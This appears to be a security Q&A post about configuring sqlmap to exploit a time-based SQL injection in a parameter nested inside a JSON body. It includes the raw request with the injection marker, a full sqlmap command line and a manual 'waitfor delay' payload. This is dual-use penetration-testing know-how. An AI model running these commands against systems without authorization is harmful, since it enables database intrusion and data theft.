# SQLmap custom injection point in JSON

Tags: sqlmap, json

The post request like this:

```
POST  /api/test/ HTTP/1.1
Host: example.com
Cookie: .ASPXAUTH=5B8094E
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 179

{"Verb":"GET","Url":"https://example/abc?testid=*&type=123&name=test&items=10&page=0&sort=&direction="}
```

The parameter testid has time-based sql injection issue. I saved this request into post.txt, set testid as the injection point, then tried use SQLmap to extract more information from the backend database.

The SQLmap command I'm using is:

```
sqlmap -r post.txt --random-agent --force-ssl --tamper=space2comment --time-sec=2
```

However, SQLmap doesn't find out the injection. I guess something wrong with the command, can someone point it out to me?

Comment: how do you know that it has a time-based sql injection issue?

Comment: when I injected '%20waitfor%20delay'0%3a0%3a15'-- into testid, the response delayed 15 seconds.

Comment: Did you see this question? https://security.stackexchange.com/questions/248524/how-to-configure-sqlmap-to-attack-json-parameter  i.e. did you try the `-p` parameter?

Comment: Yes, there's a different with the previous question, -p parameter can be used for -p url since url is the parameter in my case, but the injection point is another parameter in url value, I don't know how to use -p to specify "testId" in "url" value.

Comment: ok, then did you try testing `https://example/abc` and not going thru the API?

Comment: I updated SQLmap and rerun the previous command, and it works. Not an interesting solution, but anyway, the issue was solved. Thanks for help.